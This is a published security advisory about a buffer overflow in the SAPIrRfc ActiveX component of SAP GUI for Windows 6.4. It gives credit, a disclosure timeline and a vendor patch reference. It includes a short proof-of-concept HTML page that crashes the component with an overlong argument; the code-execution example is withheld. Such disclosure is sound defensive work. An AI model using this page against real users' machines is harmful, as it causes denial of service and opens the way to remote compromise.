|
Brought to you by:
Suppliers of:
|
|
|
| |
| SAP GUI for Windows version 6.4 contains ActiveX component SAPIrRfc which is vulnerable to Buffer overflow attack. |
| |
Credit:
The information has been provided by Alexander Polyakov .
The original article can be found at: http://dsecrg.com/pages/vul/show.php?id=115
|
| |
Vulnerable Systems:
* SAP GUI for Windows version 6.4 and prior
Attacker can construct html page which will call vulnerable function "Accept" from ActiveX Object SAPIrRfc with long parameter. When user open this vulnerable page it will occur DOS (Example 1) or full remote control on target system (Example2 execute calc.exe aviable by request)
Example:
<html>
<object classid='clsid:77F12F8A-F117-11D0-8CF1-00A0C91D9D87' id='target' />
<script> arg1="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAA"
target.Accept arg1
</script>
</html>
Patch Availability:
The issue has been solved. See SAP note 1286637.
https://service.sap.com/sap/support/notes/1286637
Disclosure Timeline:
13.11.2008 Reported
17.11.2008 Vendor response
08.06.2009 Date of Public Advisory
|
|
|
|
|
